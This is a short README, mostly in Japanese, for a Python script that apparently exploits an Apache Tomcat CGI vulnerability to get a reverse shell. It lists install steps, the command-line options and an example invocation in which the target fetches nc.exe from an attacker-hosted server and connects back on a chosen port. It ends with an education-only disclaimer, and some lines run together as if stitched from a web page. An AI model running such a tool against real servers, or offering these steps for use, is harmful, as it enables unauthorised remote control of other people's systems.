
Apache Tomcat サーバーの CGI 脆弱性を悪用し、リバースシェル接続を実行するように設計された Python スクリプト。

requests ライブラリgit clone <url-del-repositorio>
cd <directorio-del-repositorio>
pip install requests
python3 tomcat_cgi_exploit.py -t <IP_OBJETIVO> -i <IP_ATACANTE> -ncp <PUERTO_SHELL_INVERSO>
-t, --target: Apache Tomcat を実行しているターゲットの IP アドレス-i, --ip: nc.exe をホストする攻撃者の IP アドレス-ncp, --nc-port: リバースシェル接続用のポート-p, --port: ターゲットのポート (デフォルト: 8080)-sp, --server-port: nc.exe をホストするサーバーのポート (デフォルト: 80)-cgi, --cgi-script: 悪用する CGI スクリプトの名前 (デフォルト: cmd.bat)python3 tomcat_cgi_exploit.py -t 192.168.1.100 -i 192.168.1.50 -ncp 4444
このツールは、教育目的および許可されたペネトレーションテストのためにのみ提供されます。著者および貢献者は、このスクリプトによって引き起こされた誤用や損害について一切の責任を負いません。システムをテストする前に、必ず適切な許可を取得してください。